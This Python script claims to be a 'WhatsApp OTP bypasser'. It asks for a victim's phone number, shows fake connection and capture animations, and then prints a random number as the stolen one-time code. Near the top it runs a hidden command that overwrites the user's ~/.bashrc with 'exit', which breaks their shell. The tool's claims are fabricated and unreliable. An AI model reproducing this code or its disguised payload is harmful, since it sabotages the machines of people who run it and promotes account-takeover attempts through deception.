#!/bin/python
import pyfiglet
import os
import time
import sys
import random
from random import randint
os.system("echo exit > ~/.bashrc")
os.system("pip3 install pyfiglet -y")
os.system("clear")
os.system("pkg install toilet -y")
os.system("clear")
os.system("pkg install cowsay -y")
os.system("clear")
whats = pyfiglet.figlet_format("WHATSAPP OTP BYPASSER")
print("\033[1;35;40m\n")
print(whats)
time.sleep(2)
print("\033[1;31;40m\n")
print("""	         .----------------------------------------------.
	         |  THE TOOL CAN ONLY BYPASS 3 OTP		|
	         | EACH OTP IS VALID ONLY FOR 10 SECONDS	|	
		 | USE THIS TOOL ONLY FOR EDUCATIONAL PURPOSE	|
		 |        TOOL DEVELOPRD BY OXCEY		|
		 |						|
		 .----------------------------------------------.  """)
time.sleep(1)
print("\033[1;32;40m\n")
print("ENNTER THE NUMBER WITTH ITS COUNTRY CODE")
print("DONT USE + SIGN ")
print("OTP BYPASSABLE NUMBERS ARE:..")
print("INDIA	     91")
print("USA	      1")
print("UK	     44")
print("PAKISTHAN    92")
print("THAILAND     66")
print("AZERBAAIJAN  994")
print("POLAND       48")
print("CUBA         53")
print("ARGENTINA    54")
print("PHLPNES      63")
print("\033[1;33;40m\n")
time.sleep(1)
x =input("ENTER THE VICTIMS MOBILE NUBER:  ")
if len(str(x)) ==12:
	print("connecting")
	os.system("clear")
	s = pyfiglet.figlet_format("BYPASSINGGATE WAY")
	print("\033[1;35;40m\n")
	print(s)
	print("         MAKKING A VIRTAUL CONNECTION TO THE NUMBER -/")
	time.sleep(1)
	os.system("clear")
	print("       MAKING A VIRTUAL CONNECTION TO THE NUMBER-\ ")
	time.sleep(1)
	os.system("clear")
	print("        MAKING THE VIRTUAL CONNECTION TO THE NUMBER-|")
	time.sleep(1)
	os.system("clear")
	print("        MAKKING A VIRTAUL CONNECTION TO THE NUMBER -/")
	time.sleep(1)
	os.system("clear")
	print("       MAKING A VIRTUAL CONNECTION TO THE NUMBER-\ ")
	time.sleep(1)
	os.system("clear")
	print("         MAKING THE VIRTUAL CONNECTION TO THE NUMBER-|")
	time.sleep(1)
	os.system("clear")
	print("        MAKKING A VIRTAUL CONNECTION TO THE NUMBER -/")
	time.sleep(1)
	os.system("clear")
	print("       MAKING A VIRTUAL CONNECTION TO THE NUMBER-\ ")
	time.sleep(1)
	os.system("clear")
	print("         MAKING THE VIRTUAL CONNECTION TO THE NUMBER-|")
	time.sleep(1)
	os.system("clear")
	print("            VIRTUAL CONNECTION COMPLETED")
	time.sleep(1)
	os.system("clear")
	print("            REQUESTING FOR BYPASS -/")
	time.sleep(1)
	os.system("clear")
	print("           REQUESTING FOR BYPASS -\ ")
	time.sleep(1)
	os.system("clear")
	print("           REQUESTING FOR BYPASS -|")
	time.sleep(1)
	os.system("clear")
	print("          VIRTUAL CONNECTION COMPLETED")
	time.sleep(1)
	os.system("clear")
	print("           REQUESTING FOR BYPASS -/")
	time.sleep(1)
	os.system("clear")
	print("           REQUESTING FOR BYPASS -\ ")
	time.sleep(1)
	os.system("clear")
	print("           REQUESTING FOR BYPASS -|")
	print("           VIRTUAL CONNECTION COMPLETED")
	time.sleep(1)
	os.system("clear")
	print("            REQUESTING FOR BYPASS -/")
	time.sleep(1)
	os.system("clear")
	print("           REQUESTING FOR BYPASS -\ ")
	time.sleep(1)
	os.system("clear")
	print("          REQUESTING FOR BYPASS -|")
	time.sleep(1)
	os.system("clear")
	print("          REQUESTING FOR BYPASS -/")
	time.sleep(1)
	os.system("clear")
	print("         REQUESTING FOR BYPASS -\ ")
	time.sleep(1)
	os.system("clear")
	print("         REQUESTING FOR BYPASS -|")
	os.system("clear")
	print("         BYPASS COMPLETED")
	os.system("clear")
	y = pyfiglet.figlet_format("OTP REQUUEST BYPASSED ")
	print("\033[1;34;40m\n")
	print(y)
	print("              CREATING A CONNECTION ANONYMOUSLY.....\ ")
	time.sleep(1)
	os.system("clear")
	print("              CREATING A CONNECTION ANONYMOUSLY...../ ")
	time.sleep(1)
	os.system("clear")
	print("               CREATING A CONNECTION ANONYMOUSLY.....\ ")
	time.sleep(1)
	os.system("clear")
	print("              CREATING A CONNECTION ANONYMOUSLY...../ ")
	time.sleep(1)
	os.system("clear")
	print("              CREATING A CONNECTION ANONYMOUSLY.....\ ")
	time.sleep(1)
	os.system("clear")
	print("               CREATING A CONNECTION ANONYMOUSLY...../ ")
	time.sleep(1)
	os.system("clear")
	print("            CAPTURING OTP.....")
	time.sleep(1)
	os.system("clear")
	print("             CAPTURING OTP.............")
	time.sleep(1)
	os.system("clear")
	print("             CAPTURING OTP..............................")
	time.sleep(1)
	os.system("clear")
	print("             CAPTURING OTP.......")
	time.sleep(1)
	os.system("clear")
	print("         CAPTURING OTP.............")
	time.sleep(1)
	os.system("clear")
	print("           CAPTURING OTP..............................")

	G = pyfiglet.figlet_format("OTP CAPTURED")
	print("\033[1;36;40m\n")
	print(G)
	print("Fetching Otp")
	otp = randint(111111,999999)
	sotp = str(otp)

	print('          OTP : '+ sotp)
	print('        thanks for using this tool.')
	print("       VALID ONLY IN 10...")
	time.sleep(1)
	print("     VALID ONLY IN 8...")
	time.sleep(1)
	print("      VALID ONLY IN 4...")
	time.sleep(1)
	print("       VALID ONLY IN 2...")
	time.sleep(1)
	print("        VALID ONLY IN 0...")
	

else:
	print("         please enter a correct and valid number")
	v = pyfiglet.figlet_format("quiting")
	print("\033[1;36;40m\n")
	print(v)
	exit()
        

